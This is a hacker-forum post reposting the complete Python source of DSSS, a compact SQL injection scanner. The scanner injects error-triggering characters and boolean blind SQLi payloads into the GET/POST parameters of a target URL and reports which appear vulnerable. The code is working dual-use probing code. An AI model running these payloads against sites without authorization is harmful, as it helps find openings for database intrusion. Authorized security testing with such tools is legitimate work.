搜索
中国白客联盟»论坛 Techniques 编程学习(Programming Learning) 【100行Python代码扫描器】 SQL injection vulnerabilit ...
返回列表 发新帖
查看: 515|回复: 0

【100行Python代码扫描器】 SQL injection vulnerability scanner (DSSS)

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-12-2 21:12:39 | 显示全部楼层 |阅读模式
  1. #!/usr/bin/env python
  2. import difflib, httplib, itertools, optparse, random, re, urllib, urllib2, urlparse

  4. NAME    = "Damn Small sqli Scanner (DSSS) < 100 LoC (Lines of Code)"
  5. VERSION = "0.2m"
  6. AUTHOR  = "Miroslav Stampar (@stamparm)"
  7. LICENSE = "Public domain (FREE)"

  9. PREFIXES = (" ", ") ", "' ", "') ", """, "%%' ", "%%') ")              # prefix values used for building testing blind payloads
  10. SUFFIXES = ("", "-- -", "#", "%%00", "%%16")                            # suffix values used for building testing blind payloads
  11. TAMPER_SQL_CHAR_POOL = ('(', ')', '\'', '"')                            # characters used for SQL tampering/poisoning of parameter values
  12. BOOLEAN_TESTS = ("AND %d>%d", "OR NOT (%d>%d)")                         # boolean tests used for building testing blind payloads
  13. COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer"                 # optional HTTP header names
  14. GET, POST = "GET", "POST"                                               # enumerator-like values used for marking current phase
  15. TEXT, HTTPCODE, TITLE, HTML = xrange(4)                                 # enumerator-like values used for marking content type
  16. FUZZY_THRESHOLD = 0.95                                                  # ratio value in range (0,1) used for distinguishing True from False responses
  17. TIMEOUT = 30                                                            # connection timeout in seconds

  19. DBMS_ERRORS = {
  20.     "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
  21.     "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
  22.     "Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
  23.     "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
  24.     "Oracle": (r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*")
  25. }

  27. _headers = {}                                                           # used for storing dictionary with optional header values

  29. def _retrieve_content(url, data=None):
  30.     retval = {HTTPCODE: httplib.OK}
  31.     try:
  32.         req = urllib2.Request("".join(url[_].replace(' ', "%20") if _ > url.find('?') else url[_] for _ in xrange(len(url))), data, _headers)
  33.         retval[HTML] = urllib2.urlopen(req, timeout=TIMEOUT).read()
  34.     except Exception, ex:
  35.         retval[HTTPCODE] = getattr(ex, "code", None)
  36.         retval[HTML] = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "")
  37.     match = re.search(r"<title>(?P<result>[^<]+)</title>", retval[HTML], re.I)
  38.     retval[TITLE] = match.group("result") if match and "result" in match.groupdict() else None
  39.     retval[TEXT] = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\s+", " ", retval[HTML])
  40.     return retval

  42. def scan_page(url, data=None):
  43.     retval, usable = False, False
  44.     url, data = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url, re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data
  45.     try:
  46.         for phase in (GET, POST):
  47.             original, current = None, url if phase is GET else (data or "")
  48.             for match in re.finditer(r"((\A|[?&])(?P<parameter>\w+)=)(?P<value>[^&]+)", current):
  49.                 vulnerable, usable = False, True
  50.                 print "* scanning %s parameter '%s'" % (phase, match.group("parameter"))
  51.                 tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("".join(random.sample(TAMPER_SQL_CHAR_POOL, len(TAMPER_SQL_CHAR_POOL))))))
  52.                 content = _retrieve_content(tampered, data) if phase is GET else _retrieve_content(url, tampered)
  53.                 for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
  54.                     if not vulnerable and re.search(regex, content[HTML], re.I):
  55.                         print " (i) %s parameter '%s' could be error SQLi vulnerable (%s)" % (phase, match.group("parameter"), dbms)
  56.                         retval = vulnerable = True
  57.                 vulnerable = False
  58.                 original = original or (_retrieve_content(current, data) if phase is GET else _retrieve_content(url, current))
  59.                 randint = random.randint(1, 255)
  60.                 for prefix, boolean, suffix in itertools.product(PREFIXES, BOOLEAN_TESTS, SUFFIXES):
  61.                     if not vulnerable:
  62.                         template = "%s%s%s" % (prefix, boolean, suffix)
  63.                         payloads = dict((_, current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote(template % (randint + 1 if _ else randint, randint), safe='%')))) for _ in (True, False))
  64.                         contents = dict((_, _retrieve_content(payloads[_], data) if phase is GET else _retrieve_content(url, payloads[_])) for _ in (False, True))
  65.                         if all(_[HTTPCODE] for _ in (original, contents[True], contents[False])) and (any(original[_] == contents[True][_] != contents[False][_] for _ in (HTTPCODE, TITLE))):
  66.                             vulnerable = True
  67.                         else:
  68.                             ratios = dict((_, difflib.SequenceMatcher(None, original[TEXT], contents[_][TEXT]).quick_ratio()) for _ in (True, False))
  69.                             vulnerable = all(ratios.values()) and ratios[True] > FUZZY_THRESHOLD and ratios[False] < FUZZY_THRESHOLD
  70.                         if vulnerable:
  71.                             print " (i) %s parameter '%s' appears to be blind SQLi vulnerable" % (phase, match.group("parameter"))
  72.                             retval = True
  73.         if not usable:
  74.             print " (x) no usable GET/POST parameters found"
  75.     except KeyboardInterrupt:
  76.         print "\r (x) Ctrl-C pressed"
  77.     return retval

  79. def init_options(proxy=None, cookie=None, ua=None, referer=None):
  80.     global _headers
  81.     _headers = dict(filter(lambda _: _[1], ((COOKIE, cookie), (UA, ua or NAME), (REFERER, referer))))
  82.     urllib2.install_opener(urllib2.build_opener(urllib2.ProxyHandler({'http': proxy})) if proxy else None)

  84. if __name__ == "__main__":
  85.     print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
  86.     parser = optparse.OptionParser(version=VERSION)
  87.     parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. "http://www.target.com/page.php?id=1")")
  88.     parser.add_option("--data", dest="data", help="POST data (e.g. "query=test")")
  89.     parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
  90.     parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value")
  91.     parser.add_option("--referer", dest="referer", help="HTTP Referer header value")
  92.     parser.add_option("--proxy", dest="proxy", help="HTTP proxy address (e.g. "http://127.0.0.1:8080")")
  93.     options, _ = parser.parse_args()
  94.     if options.url:
  95.         init_options(options.proxy, options.cookie, options.ua, options.referer)
  96.         result = scan_page(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data)
  97.         print "\nscan results: %s vulnerabilities found" % ("possible" if result else "no")
  98.     else:
  99.         parser.print_help()
复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表